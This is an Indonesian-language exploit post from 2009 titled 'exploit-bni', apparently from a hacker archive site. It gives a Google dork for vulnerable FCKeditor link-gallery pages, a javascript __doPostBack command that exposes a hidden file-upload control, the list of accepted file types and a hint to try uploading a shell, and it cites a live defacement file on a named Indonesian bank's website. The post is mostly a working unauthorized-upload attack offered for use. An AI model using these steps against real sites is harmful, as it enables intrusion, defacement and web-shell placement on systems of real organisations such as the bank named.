__ ________ ____ ________ _____
____ _____ |__| ___________ ____ ____/ __ \/_ / __ \/ | |
/ _ \ / \| |/ ___\_ __ \/ _ \ / \____ / | \____ / | |_
( <_> ) Y Y \ \ \___| | \( <_> ) | \ / / | | / / ^ /
\____/|__|_| /__|\___ >__| \____/|___| //____/ |___| /____/\____ |
\/ \/ \/ |__|
|
[ exploit-bni ]
By omicron9194
[at] 2009-05-23
Buat pembelajaran ok 
langsung aja
Dork >>
inurl:Fck/fcklinkgallery.aspx
Pilih >> File ( A File On Your Site )
masukin script ini di URL,trus jalanin
---------------------------------------------
javascript:__doPostBack('ctlURL$cmdUpload','')
---------------------------------------------
Ntar muncul browse utk upload file,tgl di upload aja
Oia,file yg bisa di upload antara lain :
*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
shell ? coba aja 
Live : http://www.bni.co.id/Portals/0/tekateki.txt
thanks to sc0rpion [at] http://blog.sc0rpion.net/
your ip is 38.107.191.101
with CCBot/1.0 (+http://www.commoncrawl.org/bot.html)
omicron9194
send all submissions to omicron9194@yahoo.com
Copyright © 2010 omicron9194 | |
|